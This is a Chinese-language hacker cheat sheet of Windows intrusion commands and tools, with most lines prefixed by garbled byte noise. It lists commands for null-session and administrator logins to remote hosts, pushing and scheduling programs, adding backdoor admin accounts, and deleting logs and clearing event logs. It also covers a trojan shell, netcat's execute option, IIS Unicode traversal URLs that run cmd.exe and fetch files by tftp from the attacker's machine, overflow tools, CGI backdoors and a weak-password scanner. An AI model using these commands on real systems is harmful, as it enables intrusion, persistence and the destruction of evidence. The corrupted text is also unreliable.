网管和黑客都必须知道的命令
/<7��'�[x< 常用的几条NET命令:
o�?z�A'5q ��,��TL8` (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
�S-�{=4�b' yf7�p,_E/� (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
RV^�
�N4q4 8i:E$7e�tH (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
,MH/��lQq%
J�mL�{��& (查看远程主机时间) net time \\IP地址
v4�c*6��(m [�\eh$r\ � (定时启动某个程序) at \\IP地址 02:18 readme.exe
-�I
dW-9~9 ���D@�@J�7 (查看共享) net view \\IP地址
'/l<\b�/�E bz�Yj`�t�? (查看netbios工作组列表) nbtstat -A IP地址
LY��Y��3*d 9yla &X�TD (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
3%g�n�:.9N DJ)Q,l*|N9 (这两条把自己增加到管理员组): net user 用户名 密码 /add
;��7,>2VTm f�@Oi$9CZn net localgroup Administrators 用户名 /add
|6@s6]%X�} ��g
��i>`� (断开连接) net use \\IP地址\ipc$ /delete
4�yy9m8�/ d�)�hA��'k 扫尾:
+S��/OMkC� Ej�xz�X1�: del C:\winnt\system32\logfiles\*.*
�_Sa7�+�d( *?Hc8y-dG, del C:\winnt\ssytem32\config\*.evt
a�Y:���u-1 9R$0[HbI3� del C:\winnt\system32\dtclog\*.*
�hO8~�Rg
� hb@,fgo�!Q del C:\winnt\system32\*.log
q|��N,�?f9 tZ�|0w�Pp del C:\winnt\system32\*.txt
)w�T�@`p"4 n{'LF #�4l del C:\winnt\*.txt
�vH14%&OcN >#pZ`oPEAv del C:\winnt\*.log
FYe#x��]ue P�_�e9>t@� 一、netsvc.exe
>+}yI�}W;e Tfsx�&�k\ 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
�L���t'�FA L��T+�QW� netsvc /list \\IP地址
/:S&1��'�= 3`
,u^ �w� netsvc schedule \\IP地址 /query
AN)e��xU ? o'Rr2�,lVi netsvc \\IP地址 schedule /start
{�N.��J�A= 7�Lot�N6H
二、OpenTelnet.exe
^:hI bF4G� $W_sIS0\z
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OoIs'S-Z�# �_z6_�mmMp OpenTelnet \\IP地址 用户名 密码 1 7878
(���A�I�gW Ec2�?'*s�� 然后就可以telnet到主机的7878端口,进入DOS方式下:
�:X+!�W_xR �
(zIW�JJw telnet IP地址 7878
#/"?.Z;SSH )�h0�
3sv� 三、winshell.exe
�85�e�!)I_ {�p�Jf��~ 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
� �=�&8�Cg ,M?K3lG\g[ p Path (查看winshell主程序的路径信息)
*OM+d$l�!� X}f��u �$2 b reBoot (重新启动机器)
%p�;�� �'l a8�w/#!^34 d shutDown (关闭机器)
"A9�qC*6�[ j�'IZ�e�tT s Shell (执行后你就会看到可爱的“C:\>”)
sa�?Ul)�L2 ��g.,_�E4L x eXit (退出本次登录会话,此命令并不终止winshell的运行)
eVRPjVzQ'Q 9_Ws�8��nE CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
,S�V34+(�� �wk�9�qyv< 四、3389登陆器,GUI方式登录远程主机的
]K0G!T�R�< �BmhIKXE{* 五、elsave.exe
�i:�/Ws1=q q+ZN$4���m 事件日志清除工具
��O�y�G#�� *4��Hog�C� elsave -s \\IP地址 -l "application" -C
~~iFs �,�9 p�u��O�At� elsave -s \\IP地址 -l "system" -C
a[�Y\5Ojm hI6Tp>b*�~ elsave -s \\IP地址 -l "security" -C
�H$M{t�hW� D�nP
"�7}v 执行后成功清除应用程序日志,系统日志,安全日志
1`q>*S�]( +�3d.JQoKl 六、hbulot.exe
OAi����SE` v$�d^>+Y�# 开启win2kserver和winxp的3389服务
`��z1E]{A� -]~KQ�vIH! hbulot [/r]
ee�M$c`�Y< YiG�S���Fg 使用/r表示安装完成后自动重起目标使设置生效。
c,L{Qv"�n{ �A7enC,�Ey 七、nc.exe(netcat.exe)
^| r�6��>b Eb�~e=�){ 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
z�d�0�[f3~ 38zG[c|X�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
/w/um>>K�. GNX`~%3KYc 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
Ox�%.�We�5 ]_js-�+w6 参数:
�C�j5=UUnO @��Af�C�$T -e prog 程序重定向,一旦连接,就执行 [危险!!]
L (�@�".{T EC8��Fapy� -g gateway source-routing hop point[s], up to 8
\Y$�@�$) � 4�?',E ddo -G num source-routing pointer: 4, 8, 12, ...
�����V2oXg X��aw&41�K -h 帮助信息
�:8LK�}TY7 kE[H�q-J=N -i secs 延时的间隔
��A�Ac*\K� S�2P�PwCU� -l 监听模式,用于入站连接
�
��%���G> _xu_W;n��h -n 指定数字的IP地址,不能用hostname
FCIA�8^}s� +�U�a.\1"6 -o file 记录16进制的传输
d�w� YGhhm �a0)]�W%F -p port 本地端口号
LB\+*�P6QM S%�IhpTSe6 -r 任意指定本地及远程端口
VlFhfOR6�t s����$ZKd� -s addr 本地源地址
�sh�uoEeoo qBF}-N�_�� -u UDP模式
�hOM#j���� �J/��>�9�w -v 详细输出——用两个-v可得到更详细的内容
"��NvB�@>S G_v^IM#�B= -w secs timeout的时间
HLb`'TC3r+ |_u|Td��(n -z 将输入输出关掉——用于扫描时
�\�H�{U�J 八、TFTPD32.EXE
$Ma*q�EB KYM%U"�j�D 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
�A|<i7�QVY Lgr�p��y�� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�a_(fqo�W� ^X|��Bzz)� 然后可以直接令文件运行:
@$R^-�_��m � C��T[CM+ http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
JWV��n@)s� |0$7{n�Q�� 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
`7
3I}%�? hwi$�:��[� 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
xz*MFoE��� d 6=Z=4w� 一、一 Xscan命令行运行参数说明:
��,�T0q.!d [W��Ud9fUL 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
z+�{Q(8'b] ��v<:/u�(i 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
%�ou�@Y�` m�~R�Me9Qi xscan -file <主机列表文件名> <检测项目> [其他选项]
�/� TAza9a �|��*y'H* 其中<检测项目> 含义如下:
O�`TM}��� k.��?@qCs[ -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
rO�T�xD��/ b0aV?A}t�h -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
E�n���c�JB [?S-��on.� -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
T�u7}*vsR
.q5W��K#^ -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
e�eCrH�t4; �3)�3�$ �L -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
J{r�3�y�&: AkA2/7��<[ [其他选项] 含义如下:
CH] +S��>$ �qr���kJ: -v: 显示详细扫描进度
��_E�us7�� �O���Y,i�z -p: 跳过Ping不通的主机
|*JMCI�@Mz GEJy?�$9 � -o: 跳过没有检测到开放端口的主机
d�6zfP1�lQ G%�XjDxo$I -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
